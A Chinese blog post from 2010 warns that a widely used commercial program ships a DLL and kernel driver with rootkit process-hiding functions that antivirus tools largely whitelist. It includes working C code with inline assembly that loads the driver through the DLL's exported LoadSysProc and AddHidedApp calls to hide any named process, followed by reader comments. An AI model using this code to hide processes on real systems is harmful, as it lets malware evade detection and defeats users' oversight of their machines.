正规软件带rootkit模块后果很严重

一不小心从某软件里看到一个强大的dll与强大的sys,直接上图看dll的导出函数:

看到了吗,可以直接调一下就隐藏进程。

由于这个软件的使用范围还非常的广,所有这两个文件基本已被杀软白名单放过,上传到virustotal上看看:

sys文件:     结果: 1/41 (2.44%)

dll文件:     结果: 0/41 (0.00%)

如果这两个模块由木马携带,被木马利用。。。。。

调用方法:
int _tmain(int argc, _TCHAR* argv[])
{
 BOOL retval;
 char ProcessName[100];
 HMODULE hModule=LoadLibrary(_T("sysproc.dll"));
 DWORD Addr=(DWORD)GetProcAddress(hModule,"LoadSysProc");
 __asm
 {
  mov eax,Addr;
  call eax;
  mov retval,eax;
 }

 printf("加载驱动:%d \n输入要隐藏的进程名:",retval);

 scanf("%s",ProcessName);

 

 Addr=(DWORD)GetProcAddress(hModule,"AddHidedApp");
 __asm
 {
  lea  eax,ProcessName;
  push eax;
  mov eax,Addr;
  call eax;
  mov retval,eax;
 }
 printf("%d \n",retval);

 return 0;
}

  • quote 3.飞心
  • 百度了一哈,应该是这个吧http://www.sicent.com/index.html。
    也不奇怪,360还有洞洞呢~~~
  • 2010-02-09 15:04:37 回复该留言
  • quote 4.look
  • http://bbs.pediy.com/showthread.php?t=25626
    langouster 于 2010-02-09 18:23:54 回复
    估计这个软件的开发人员就是看到这个贴后,A了这段代码,用在它们的软件里了,太山寨了。
  • 2010-02-09 17:05:22 回复该留言

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

日历

最新评论及回复

最近发表

Copyright langouster. Some Rights Reserved.   苏ICP备06046736号   

本站点由 Z-Blog 2.0 bate Build 构建,基于 Glued Ideas Subtle 主题,由 zx.asd 移植并创新.